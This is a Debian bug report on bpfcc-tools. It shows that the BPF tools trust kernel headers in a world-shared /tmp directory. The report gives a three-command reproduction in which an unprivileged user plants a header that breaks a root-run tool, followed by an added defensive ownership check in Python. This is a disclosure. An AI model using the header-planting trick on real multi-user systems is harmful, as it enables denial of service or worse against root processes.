Package: bpfcc-tools
Version: 0.25.0+ds-1
Tags: security
If kernel headers are not installed in the usual place, the BPF tools
try to look them up in /tmp/kheaders-$(uname -r)/, even when this
directory is owned by another user.
This can be exploited for denial of service, or likely something worse.
To reproduce, run this as a normal user:
$ mkdir /tmp/kheaders-$(uname -r)/
$ mkdir -p /tmp/kheaders-$(uname -r)/include/linux/
$ echo "#error this header is malicious" > /tmp/kheaders-$(uname -r)/include/linux/kconfig.h
Then run this as root:
# opensnoop-bpfcc
In file included from <built-in>:1:
././include/linux/kconfig.h:1:2: error: this header is malicious
#error this header is malicious
^
In file included from <built-in>:2:
/virtual/include/bcc/bpf.h:12:10: fatal error: 'linux/types.h' file not found
#include <linux/types.h>
^~~~~~~~~~~~~~~
2 errors generated.
Traceback (most recent call last):
  File "/usr/sbin/opensnoop-bpfcc", line 261, in <module>
    b = BPF(text='')
        ^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bcc/__init__.py", line 476, in __init__
    raise Exception("Failed to compile BPF module %s" % (src_file or "<text>"))
Exception: Failed to compile BPF module <text>
-- System Information:
Debian Release: bookworm/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 6.1.0-1-amd64 (SMP w/1 CPU thread; PREEMPT)
Locale: LANG=C.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages bpfcc-tools depends on:
ii python3 3.11.1-1
ii python3-bpfcc 0.25.0+ds-1
ii python3-netaddr 0.8.0-2
--
Jakub Wilk
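
Added example, not part of the original report and not bcc's own code: a check an administrator could run before starting a BPF tool as root, to decide whether the /tmp/kheaders-$(uname -r)/ directory described above can be trusted. The function names, the trusted_uid parameter and the reason strings are assumptions made for this illustration.

```python
import os
import stat


def kheaders_dir(release=None, tmp="/tmp"):
    """Path of the fallback header directory named in the report."""
    return os.path.join(tmp, "kheaders-" + (release or os.uname().release))


def is_trusted_header_dir(path, trusted_uid=0):
    """Return (ok, reason) for a header directory under a shared /tmp.

    The directory is trusted only if it is a real directory (not a
    symlink), is owned by trusted_uid (root by default) and cannot be
    written by group or others.
    """
    try:
        # lstat, not stat: a symlink planted in /tmp must not be followed.
        st = os.lstat(path)
    except FileNotFoundError:
        return False, "missing"
    if stat.S_ISLNK(st.st_mode):
        return False, "symlink"
    if not stat.S_ISDIR(st.st_mode):
        return False, "not a directory"
    if st.st_uid != trusted_uid:
        return False, "owned by uid %d" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False, "group/world writable"
    return True, "ok"


if __name__ == "__main__":
    path = kheaders_dir()
    ok, reason = is_trusted_header_dir(path)
    verdict = "trusted" if ok else "NOT trusted (%s)" % reason
    print("%s: %s" % (path, verdict))
```

The check covers only the top-level directory; it says nothing about files or subdirectories inside it.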